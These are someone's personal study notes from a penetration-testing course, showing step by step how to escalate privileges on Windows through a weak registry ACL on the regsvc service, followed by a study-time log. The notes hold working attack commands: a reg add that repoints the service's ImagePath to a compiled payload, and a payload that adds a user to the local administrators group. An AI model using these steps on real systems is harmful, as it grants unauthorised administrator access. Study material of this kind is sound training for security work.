Search

regsvc ACL

Service escalation dealing with the registry

Checking the registry service to see if we have FullControl over a registry key

to check for it (in Powershell):

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
image

It says FullControl over this (means we can exploit)

We can add this executable to a service and start this service and the service will come back and add a user for us

Get the file from the windows machine using FTP:

Kali:

python3 -m pyftpdlib -p 21 --write
#If you need to install: pip3 install pyftpdlib

In Windows:

Go to source files location and open CMD from that folder by shift+right clicking then:

ftp 10.6.62.12
anonymous
anonymous
put windows_service.c

In Kali:

Stop the FTP (ctrl+c):

sudo mousepad windows_service.c 

Change the whoami command to what you want (adding a user to admins):

cmd.exe /k net localgroup administrators user /add

Make an executable:

x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Host server to move x.exe to the Windows machine in Temp:

Download > Save > Local C > Temp

In Windows:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

Add to regsvc

/v: what registry entry do I want to be adding for this subkey. What’s the value name

ImagePath is a registry key that contains the path of the drivers image file

/t: the type

REG_EXPAND_SZ: the type is a string value

/d: the data

c:\temp\x.exe: where the data is

/f: don’t prompt me for this. I don’t want any confirmation when I run this; Just execute.

Run it/Start it:

sc start regsvc

confirm:

net localgroup administrators

3:30 hours left including notes on 1.5x

I think linux was 6 hours

Current combined time is about 10:30 hours including notes on 1.5x

2 days 5:30 each (4/8 4/9)

4/10 review PEH (maybe web app pentesting?)